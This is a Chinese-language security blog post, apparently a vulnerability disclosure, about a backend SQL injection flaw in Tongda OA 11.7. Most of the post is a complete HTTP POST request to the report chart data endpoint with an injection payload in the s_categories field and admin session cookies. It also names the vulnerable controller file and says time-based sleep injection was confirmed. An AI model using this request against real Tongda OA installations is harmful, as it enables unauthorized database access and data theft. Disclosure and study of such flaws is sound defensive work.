0Day | 通达 OA 11.7 存在后台 SQL 注入漏洞

地球胖头鱼 2020-10-15
系统与内网安全 发布于 2020-10-15 11:08:56 阅读 74 评论 0

0Day | 通达OA 11.7 存在后台SQL注入漏洞

POST /general/appbuilder/web/report/repchart/data 
HTTP/1.1UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Referer: http://192.168.202.1/general/appbuilder/web/report/repchart?reportId=
X-ResourceType: xhr
Cookie: PHPSESSID=1kqh5um8augkhrq8q6n7t23h46; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=cb7abbef
Connection: close
Host: 192.168.202.1
Pragma: no-cache
x-requested-with: XMLHttpRequest
Content-Length: 539
x-wvs-id: Acunetix-Deepscan/288
Cache-Control: no-cache
accept: */*
origin: http://192.168.202.1
Accept-Language: en-US
content-type: application/x-www-form-urlencoded; charset=UTF-8

data_path=%5B%5D&s_categories="23fd<>select 9j@!fdf" #)&i_dataset=10&params%5BsearchParams%5D%5B0%5D%5Bid%5D=&params%5BsearchParams%5D%5B0%5D%5Bkey%5D=1598155037212&params%5BsearchParams%5D%5B0%5D%5Blabel%5D=%E5%85%AC%E5%91%8AID&params%5BsearchParams%5D%5B0%5D%5Btype%5D=text&params%5BsearchParams%5D%5B0%5D%5Bvalue%5D=&params%5BsearchParams%5D%5B0%5D%5Bscope%5D=equal&params%5BsearchParams%5D%5B0%5D%5Bmacro%5D=false&params%5BsearchParams%5D%5B0%5D%5Btype_of_data%5D=rep&params%5BsearchParams%5D%5B0%5D%5Btype_of_reports%5D=select&id=

漏洞证明

查看Mysql数据库的执行过程,mysql日志文件,可以发现s_categories传入的参数,被mysql数据库完整执行了,没有任何过滤,可以确定存在 mysql注入漏洞

漏洞文件

webroot\general\appbuilder\modules\report\controllers\RepChartController.php

测试执行sleep函数,注释后面语句来测试,被成功执行。

挖掘思路

Fuzz+sql日志关键字匹配+审计

原创:安译See

本作品采用《CC 协议》,转载必须注明作者和本文链接
讨论数量: 0
(= ̄ω ̄=)··· 暂无内容!
请勿发布不友善或者负能量的内容。与人为善,比聪明更重要!
地球胖头鱼
未填写
  • 作者发布文章72
  • 作者收获粉丝1
  • 作者收到点赞0
  • 所有文章被收藏了0
  • 博客总访问量排行第6
  • 博客总访问量4376(每日更新)
查看所有博文